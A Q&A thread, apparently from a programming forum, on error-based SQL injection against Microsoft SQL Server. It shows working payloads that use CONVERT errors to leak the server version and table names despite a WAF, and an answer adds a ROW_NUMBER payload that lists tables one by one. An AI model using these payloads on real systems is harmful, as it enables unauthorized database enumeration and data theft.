# MSSQL injection

Tags: sql, sql-server, code-injection

I just setup a test bed and i disabled information_schema from being accessed (a weak waf) and i've been trying to extract the table list from the database by using convert to spit out a conversion error with the contained information.
To extract the version we use the syntax:
+and+1=convert(int,@@version)
The result will be:

```
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 R2 (SP2) Copyright (c) Microsoft Corporation Standard Edition Windows NT 6.1 (Build 7601: Service Pack 1) (Hypervisor) ' to data type int.
```

The result of the query is what is within the single quotes.
Now to get the first table from the database normally we would use:

```
convert(int,(select+top+1+table_name+from+information_schema.tables))
```

Which would lead to the error:

```
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'tblDepartement' to data type int.

index.asp, line 30
```

Again with the answer being within the two single quotes which is `tblDepartement`.
Alternative way to extract the table names would be to use these following 2 queries:

```
(A):SELECT name FROM sys.tables
```

(B):`select * from sys.tables`.
If i try (A) with this syntax:

```
convert(int,(select name FROM sys.tables))
```

I get the error:

```
Error Executing Database Query.
[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect syntax near the keyword 'from'.
```

If i try (B) with this syntax:
`convert(int,(select * FROM sys.tables))`
I get the error:

```
Error Executing Database Query.
[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect syntax near '*'.
```

So my question is, how can i not use information_schema and use sys.tables instead inside the convert syntax so i can get the table list from the database?
Thanks.

Comment: If `select+top+1+table_name+from+information_schema.tables` works then there is no reason that `select+top+1+table_name+from+sys.tables`  wouldn't.

Comment: @MartinSmith Well i don't know why either, but it doesn't work :(.

Answer (score 0):

The [`CONVERT` function](http://msdn.microsoft.com/library/ms187928.aspx) expects an [expression](http://msdn.microsoft.com/library/ms190286.aspx), which in case of a subquery must be scalar:

```
{ constant | scalar_function | [ table_name. ] column | variable  
    | ( expression ) | ( scalar_subquery ) 
    | { unary_operator } expression 
    | expression { binary_operator } expression  
    | ranking_windowed_function | aggregate_windowed_function
}
```

Further:

> **( *scalar_subquery* )**
>
> Is a subquery that returns one value. For example:
>
> ```
> SELECT MAX(UnitPrice)
> FROM Products
> ```

So your [subquery in place of an expression](http://msdn.microsoft.com/library/aa213270.aspx) must return only one single value, so neither multiple columns nor multiple rows.

For both of your queries (A) and (B) this restriction is not met as the [TABLES table](http://msdn.microsoft.com/library/ms186224.aspx) has multiple columns and also multiple rows.

To enumerate all table names, you just have to request each table name separately like this:

```
CONVERT(INT, (
  SELECT TOP 1 table_name
  FROM (
      SELECT table_name, ROW_NUMBER() OVER (ORDER BY table_name) AS row_num
      FROM information_schema.tables
  ) t
  WHERE row_num > 123
))
```

Unfortunately Transact-SQL requires this [`ROW_NUMBER()`](http://msdn.microsoft.com/library/ms186734.aspx) thing for offset selections.

Comment: @user3313946 But didn’t you say `convert(int,(select top 1 table_name from information_schema.tables))` was working?